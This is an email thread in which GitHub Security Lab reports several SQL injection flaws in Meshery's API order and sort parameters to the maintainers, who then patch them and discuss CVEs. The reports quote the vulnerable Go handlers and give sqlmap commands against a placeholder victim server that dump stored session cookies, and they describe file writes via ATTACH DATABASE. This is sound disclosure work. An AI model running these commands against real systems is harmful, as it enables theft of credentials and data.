Re: GitHub Security Lab (GHSL) Vulnerability Report, Meshery

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Lee Calcote

Dec 13, 2023, 12:25:02 PM12/13/23
to Kevin Stubbings, Meshery Maintainers,,, Tony Torralba
Hi Kevin,

Thank you for this comprehensive report. Security vulnerability acknowledged. 

I’m am copying the maintainers list for additional visibility and scheduling of a fix.

Warm regards,
Meshery Maintainer

On Dec 13, 2023, at 10:27 AM, 'Kevin Stubbings' via Meshery Security and Vulnerability Reports <> wrote:

Greetings meshery maintainers,

Github Security Lab has found a potential vulnerability in meshery. I have appended the report to the bottom of this email. Please let us know if you have any questions or need help with patching. Please respond back to this email to let us know that you have received this email and are the correct point of contact. 

Thank you,

GitHub Security Lab (GHSL) Vulnerability Report, Meshery: GHSL-2023-249

The GitHub Security Lab team has identified a potential security vulnerability in Meshery.

We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at (please include GHSL-2023-249 as a reference). See also this blog post written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are NOT the correct point of contact for this report, please let us know!


A SQL injection vulnerability in Meshery up to v0.7.1 allows a remote attacker to obtain sensitive information via the order parameter of GetMeshSyncResources.



Tested Version



SQL injection in GetMeshSyncResources (GHSL-2023-249)

The Meshery project exposes the function GetMeshSyncResources at the API URL /api/system/meshsync/resources. The order query parameter is directly used to build a SQL query in line 135 of the meshync_handler.go file, as it can be seen in the following snippet:

func (h *Handler) GetMeshSyncResources(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {
	// --snip--
	order := r.URL.Query().Get("order")
	sort := r.URL.Query().Get("sort")
	// --snip--

	result := provider.GetGenericPersister().Model(&model.KubernetesResource{}).

        // --snip--

	if order != "" {
		if sort == "desc" {
			// --snip--
		} else {
			result = result.Order(order)

	err := result.Find(&resources).Error
	// --snip--


This issue may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command.

Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.

Arbitrary data read and write may be a problem depending on several factors:

  • Whether there's user authentication (if not, unauthenticated users may access the data querying the API normally).
  • Whether there's user authorization (if not, authenticated users may be able to access all data querying the API normally).
  • Whether there's actual sensitive data, like session cookies or credentials, added to Meshery (depends on the configuration).


Most database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements. Use these features rather than building queries by string concatenation.

Similar vulnerabilities (e.g. CVE-2023-46575) have been fixed in this project using the SanitizeOrderInput function.


To reproduce this issue, the following three requests can be used to write a file at an arbitrary location with arbitrary contents (note that an appropriate cookie needs to be used in the request, for local authentication use Cookie: meshery-provider=None):


Verify that the test file was created:

cat /tmp/test

Also, arbitrary database entries can be created by issuing a request to the following URL:


To extract information from the database, blind SQL injection techniques must be used. For instance, we could use sqlmap to automate the process of dumping the request cookies used in a performance profile:

$ sqlmap -u 'http://(victim server):9081/api/system/meshsync/resources?order=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump


Table: performance_profiles
[1 entry]
| request_cookies           |
| {"Session": "test_value"} |

GitHub Security Advisories

We recommend you create a private GitHub Security Advisory for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is published.


This issue was discovered and reported by GitHub CodeQL team member @atorralba (Tony Torralba).


You can contact the GHSL team at, please include a reference to GHSL-2023-249 in any communication regarding this issue.

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

You received this message because you are subscribed to the Google Groups "Meshery Security and Vulnerability Reports" group.
To unsubscribe from this group and stop receiving emails from it, send an email to
To view this discussion on the web visit

Lee Calcote

Feb 2, 2024, 1:56:46 AMFeb 2
to Kevin Stubbings, Pranav Singh, Antonette Caldwell, Xin1 Huang, Meshery Maintainers,,, Tony Torralba,
Hi Kevin, thanks much for following up on this. Are you guys using Meshery, by chance? Or are you sharpening your Vuln Report / CVE tools against CNCF stones, or accruing your monthly bug quota, or other? Regardless, we certainly appreciate this and we’ll want to ensure that this is fixed.

Hi Antonette, Xin, or Pranav, I wonder if either of the two of you might be able to prioritize a fix this coming week. What do you think?


On Feb 1, 2024, at 12:28 PM, Kevin Stubbings <> wrote:

Greetings Lee,
It has been a bit over a month. Just wanted to check in on the progress. Please let me know if you have a scheduled date for the fix or if there is anything I can do to help.
Kevin Stubbings

Huang, Xin1

Feb 2, 2024, 8:59:44 AMFeb 2
to Kevin Stubbings, Pranav Singh, Antonette Caldwell, Calcote, Lee, Meshery Maintainers,,, Tony Torralba,
Hi Kevin and Lee,

I can pay my attention on this issue next week.

Xin Huang

From: 'Lee Calcote' via Meshery Maintainers <>
Sent: Friday, February 2, 2024 14:56
To: Kevin Stubbings <>; Pranav Singh <>; Antonette Caldwell <>; Huang, Xin1 <>
Cc: Meshery Maintainers <>; <>; <>; Tony Torralba <>; <>
Subject: [meshery-maintainers] Re: GitHub Security Lab (GHSL) Vulnerability Report, Meshery
Visit and engage with the Meshery community in the forum at or in Slack at
You received this message because you are subscribed to the Google Groups "Meshery Maintainers" group.
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You received this message because you are subscribed to the Google Groups "Meshery Security and Vulnerability Reports" group.
To unsubscribe from this group and stop receiving emails from it, send an email to
To view this discussion on the web visit

Kevin Stubbings

Feb 2, 2024, 9:00:43 AMFeb 2
to Lee Calcote, Meshery Maintainers,,, Tony Torralba
Greetings Lee,
It has been a bit over a month. Just wanted to check in on the progress. Please let me know if you have a scheduled date for the fix or if there is anything I can do to help.
Kevin Stubbings

On Wed, Dec 13, 2023 at 9:25 AM Lee Calcote <> wrote:

Lee Calcote

Feb 2, 2024, 9:53:37 AMFeb 2
to Huang, Xin1, Kevin Stubbings, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Thank you very much, Xin. 

Hi Kevin, if you are at all inclined, I certainly encourage you to list this vulnerability in the table with other CVEs on this page -

Thanks again for engaging here. 


On Feb 2, 2024, at 2:21 AM, Huang, Xin1 <> wrote:

Kevin Stubbings

Feb 5, 2024, 11:13:07 PMFeb 5
to Lee Calcote, Huang, Xin1, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Hello Lee, Xin
Thats cool that you have a security vulnerabilities board for your project. I am quite busy but will let you know about inputting the vulnerability in the project's website. Would you like us to assign a CVE for this vulnerability, or have you already requested one from some other source?  Please let me know once the vulnerability is fixed so we can analyze the patch to ensure everything looks good and release our own advisory.

Huang, Xin1

Feb 6, 2024, 8:48:18 PMFeb 6
to Kevin Stubbings, Calcote, Lee, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Hi Kevin,

I've created a patch to fix the vulnerability, please have a look. If you have any questions please let me know.

Xin Huang

From: Kevin Stubbings <>
Sent: Tuesday, February 6, 2024 12:12
To: Calcote, Lee <>
Cc: Huang, Xin1 <>; Pranav Singh <>; Antonette Caldwell <>; Meshery Maintainers <>; <>; <>; Tony Torralba <>; <>
Subject: Re: [meshery-maintainers] Re: GitHub Security Lab (GHSL) Vulnerability Report, Meshery

Kevin Stubbings

Feb 12, 2024, 12:46:41 PMFeb 12
to Huang, Xin1, Calcote, Lee, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Hello Xin, Lee,
We have confirmed the patch fixes the vulnerability. Unfortunately, it seems in between the time of our initial report (December 13) and now, two more vulnerabilities of the same nature have been introduced, both exploitable in the latest release. I have appended the report below. Please note that the cause of these vulnerabilities are due to the fact that the ORM used by Meshery, GORM, is vulnerable to SQL injection on certain methods, mentioned here in the documentation. We highly recommend you let any developers and reviewers know this fact so they remember to sanitize the user input before placing them into those problematic methods. Like I mentioned in a previous email, we request  CVEs for all the vulnerabilities we find, so if you have any preference that you would like to request them from a CNA yourself please let us know, otherwise we will go ahead and assign them ourselves and I will let you know the corresponding CVEs. We have also found another vulnerability that is unexploitable due to a seeming error in the code, which I will detail in a followup email without an "official report". We hope you can fix this non-exploitable vulnerability because future changes to the code may make it exploitable.


GitHub Security Lab (GHSL) Vulnerability Report, Meshery: GHSL-2024-013GHSL-2024-014

The GitHub Security Lab team has identified potential security vulnerabilities in Meshery.

We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at (please include GHSL-2024-013 or GHSL-2024-014 as a reference). See also this blog post written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are NOT the correct point of contact for this report, please let us know!


A SQL injection vulnerability in Meshery up to v0.7.18 allows a remote attacker to obtain sensitive information, alter database registries, or create arbitrary files via the order and sort parameters of two HTTP endpoints.



Tested Version



Issue 1: SQL injection in /api/system/meshync/resources/kinds (GHSL-2024-013)

The Meshery project exposes the function GetMeshSyncResourcesKinds at the API URL /api/system/meshsync/resources/kinds. The order query parameter is directly used to build a SQL query in meshync_handler.go, as it can be seen in the following snippet:

func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {
	// --snip--

	page, offset, limit,
		search, order, sort, _ := getPaginationParams(r)

        // --snip--

	result := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct("kind").
		Where("kubernetes_resources.cluster_id IN (?)", filter.ClusterIds)

// --snip--

	if order != "" {
		if sort == "desc" {
			// --snip--
		} else {
			result = result.Order(order
        // --snip--


This issue may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command.

Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.

Arbitrary data read and write may be a problem depending on several factors:

  • Whether there's user authentication (if not, unauthenticated users may access the data querying the API normally).
  • Whether there's user authorization (if not, authenticated users may be able to access all data querying the API normally).
  • Whether there's actual sensitive data, like session cookies or credentials, added to Meshery (depends on the configuration).


Most database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements. Use these features rather than building queries by string concatenation.

Similar vulnerabilities (e.g. CVE-2023-46575) have been fixed in this project using the SanitizeOrderInput function.


To reproduce this issue, the following three requests can be used to write a file at an arbitrary location with arbitrary contents (note that an appropriate cookie needs to be used in the request, for local authentication use Cookie: meshery-provider=None):

cat /tmp/test

Also, arbitrary database entries can be created as follows:


To extract information from the database, blind SQL injection techniques must be used. For instance, we could use sqlmap to automate the process of dumping the request cookies used in a performance profile:

$ sqlmap -u 'http://(victim server):9081/api/system/meshsync/resources/kinds?order=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump


Table: performance_profiles
[1 entry]
| request_cookies           |
| {"Session": "test_value"} |

Issue 2: SQL injection in /api/v2/events (GHSL-2024-014)

The Meshery project exposes the function GetAllEvents at the API URL /api/v2/events. The sort query parameter read in events_streamer.go is directly used to build a SQL query in events_persister.go, as it can be seen in the following snippets:

func (h *Handler) GetAllEvents(w http.ResponseWriter, req *http.Request, prefObj *models.Preference, user *models.User, provider models.Provider) {
        // --snip--

	page, offset, limit,
		search, order, sortOnCol, status := getPaginationParams(req)

        // --snip--

        filter, err := getEventFilter(req)

        // --snip--

	filter.SortOn = sortOnCol

        // --snip--

	eventsResult, err := provider.GetAllEvents(filter, userID)

        // --snip--
func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {
        // --snip--

	finder := e.DB.Model(&events.Event{}).Where("user_id = ?", userID)

        // --snip--

        if eventsFilter.Order == "asc" {
		finder = finder.Order(eventsFilter.SortOn)

        // --snip--


This issue may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command.

Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.

Arbitrary data read and write may be a problem depending on several factors:

  • Whether there's user authentication (if not, unauthenticated users may access the data querying the API normally).
  • Whether there's user authorization (if not, authenticated users may be able to access all data querying the API normally).
  • Whether there's actual sensitive data, like session cookies or credentials, added to Meshery (depends on the configuration).


Most database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements. Use these features rather than building queries by string concatenation.

Similar vulnerabilities (e.g. CVE-2023-46575) have been fixed in this project using the SanitizeOrderInput function.


cat /tmp/test

Also, arbitrary database entries can be created as follows:


To extract information from the database, blind SQL injection techniques must be used. For instance, we could use sqlmap to automate the process of dumping the request cookies used in a performance profile:

$ sqlmap -u 'http://(victim server):9081/api/v2/events?order=asc&sort=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump


Table: performance_profiles
[1 entry]
| request_cookies           |
| {"Session": "test_value"} |

GitHub Security Advisories

We recommend you create a private GitHub Security Advisory for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published.


These issues were discovered and reported by GitHub team member @atorralba (Tony Torralba).


You can contact the GHSL team at, please include a reference to GHSL-2024-013 or GHSL-2024-014 in any communication regarding these issues.

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

Kevin Stubbings

Feb 15, 2024, 1:07:02 AMFeb 15
to Huang, Xin1, Calcote, Lee, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Hello Xin, Lee,
Here is the unexploitable bug, same nature as the others.

A GET request to /api/integrations/credentials is handled by Handler.GetUserCredentials:

func (h *Handler) GetUserCredentials(w http.ResponseWriter, req *http.Request, _ *models.Preference, user *models.User, provider models.Provider) {
	q := req.URL.Query()

	page, _ := strconv.Atoi(q.Get("page"))
	order := q.Get("order")
	search := q.Get("search")
	pageSize, _ := strconv.Atoi(q.Get("page_size"))

	// --snip--

	credentialsPage, err := provider.GetUserCredentials(req, user.ID, page, pageSize, order, search)

The search query parameter, among others, is sent to provider.GetUserCredentials, which resolves to DefaultLocalProvider.GetUserCredentials if local authentication is used (the default):

func (l *DefaultLocalProvider) GetUserCredentials(_ *http.Request, userID string, page, pageSize int, search, order string) (*CredentialsPage, error) {
	result := l.GetGenericPersister().Select("*").Where("user_id=? and deleted_at is NULL", userID)
	if result.Error != nil {
		return nil, result.Error
	if search != "" {
		like := "%" + strings.ToLower(search) + "%"
		result = result.Where("(lower(name) like ?)", like)

	result = result.Order(order)

See how the order parameter is used without sanitization as the argument of result.Order, which causes the SQL injection. Note that the search and order parameters are swapped on the callsite, so order is actually the search parameter of the GET request.

As far as I can tell, this is not exploitable because the initial query "SELECT * WHERE user_id = userID and deleted_at is NULL" causes an error, which forces an early exit at return nil, result.Error.



Kevin Stubbings

Mar 5, 2024, 7:38:32 PMMar 5
to Huang, Xin1, Calcote, Lee, Pranav Singh, Antonette Caldwell, Meshery Maintainers,,, Tony Torralba,
Hello Xin, Lee,

We are going to go ahead and assign a CVE for GHSL-2023-249 this coming Monday, March 11 since the 90 day advisory period is coming up on March 14. We will let you know the CVE number we assigned. We would love to hear if you have patched any of the other GHSLs. Thanks for the support in patching these vulnerabilities.

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